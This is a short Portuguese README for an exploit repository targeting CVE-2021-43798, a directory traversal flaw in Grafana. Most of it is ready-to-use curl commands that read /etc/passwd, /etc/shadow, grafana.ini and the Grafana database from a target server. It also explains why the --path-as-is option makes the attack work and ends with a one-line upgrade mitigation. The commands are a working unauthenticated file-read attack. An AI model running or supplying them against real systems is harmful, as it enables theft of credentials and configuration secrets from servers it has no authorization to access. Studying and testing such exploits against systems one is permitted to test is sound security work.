
Exploit para CVE-2021-43798, uma vulnerabilidade de travessia de diretório no Grafana, permitindo leituras arbitrárias de arquivos não autenticadas através de comandos curl personalizados.
Este repositório demonstra a exploração do CVE-2021-43798, uma vulnerabilidade de travessia de diretório no Grafana. Essa vulnerabilidade permite que invasores leiam arquivos arbitrários no servidor.
Para explorar a vulnerabilidade manualmente, você pode usar um dos seguintes comandos curl para tentar ler arquivos sensíveis:
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"
No contexto da exploração da vulnerabilidade de travessia de diretório do Grafana CVE-2021-43798, a opção --path-as-is é essencial porque permite que as sequências de travessia especialmente criadas (../../../../../) sejam enviadas diretamente ao servidor sem modificação. Isso pode levar ao acesso a arquivos sensíveis no servidor que estão fora do diretório pretendido.
Sem --path-as-is, o curl pode normalizar o caminho para algo como /public/plugins/Users/install.txt, o que não exploraria a vulnerabilidade. Ao usar --path-as-is, a sequência exata de travessia é preservada, permitindo que a exploração seja bem-sucedida.
Você pode encontrar mais detalhes sobre a opção --path-as-is na documentação do curl. Ao entender e utilizar --path-as-is, profissionais de segurança e pesquisadores podem demonstrar e testar efetivamente vulnerabilidades de travessia de diretório em aplicações web.
Para mitigar essa vulnerabilidade, atualize o Grafana para a versão 8.3.1 ou posterior.